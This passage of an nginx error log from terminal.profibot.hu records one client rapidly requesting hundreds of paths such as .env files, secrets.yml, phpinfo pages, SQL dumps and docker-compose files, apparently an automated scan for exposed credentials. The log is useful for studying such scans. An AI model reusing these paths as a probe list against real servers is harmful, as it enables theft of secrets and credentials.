*29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/secrets.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/settings.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ContainerRegistry/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /containers/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /content/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /control/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /core/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /core/Datavase/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /core/persistence/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /core/src/main/resources/org/jobrunr/dashboard/frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /counterblockd/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /counterwallet/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cronlab/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cryo_project/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /css/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /custom/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /d/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dashboard/i.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dashboard/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dashboard/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dashboard/test.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /data/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /database/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dataset1/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dataset2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /db-admin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /db.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug/default/view.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /default/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /delivery/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /demo-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /demo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dep.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /deploy.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /deploy/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /deployment-config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev_env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /developer.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /developer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /developerslv/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /development/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /devs.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /devtools HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /directories/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dist/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:52 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dist/js/app.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /django-blog/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /django/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /django_project_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /doc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker-compose.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker-compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker-compose/platform/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker-elk/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker-network-healthcheck/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker-node-mongo-redis/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/compose/withMongo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/compose/withPostgres/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/database/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/db/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/examples/compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/postgres/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker/webdav/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dodoswap-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dotfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /download/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /downloads/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /drupal/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /e2e/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /en/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /engine/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.template HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env/dockers/mariadb-test/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env/dockers/php-apache/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env/example/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env/template/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /environments/local/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /environments/production/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:53 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /envs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /error.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /error/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /errors/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /example/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /example02-golang-package/import-underscore/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /example27-how-to-load-env/sample01/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /example27-how-to-load-env/sample02/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/01-simple-model/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/02-complex-example/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/03-one-to-many-relationship/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/04-many-to-many-relationship/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/05-migrations/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/06-base-service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/07-feature-flags/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/08-performance/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/09-production/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/10-subscriptions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/11-transactions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/drupal-separate-services/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/react-dashboard/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/sdl-first/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/sdl-first/prisma/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/vue-dashboard/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/with-cookie-auth-fauna/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/with-dotenv/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/with-firebase-authentication-serverless/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/with-react-relay-network-modern/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/with-relay-modern/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /examples/with-universal-configuration-build-time/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /exapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Exercise.Frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Exercise.Frontend/train/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /export/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fastlane/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /favicons/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:54 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /favs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /FE/huey/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fedex/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fhir-api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /files/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fileserver/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /films/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: 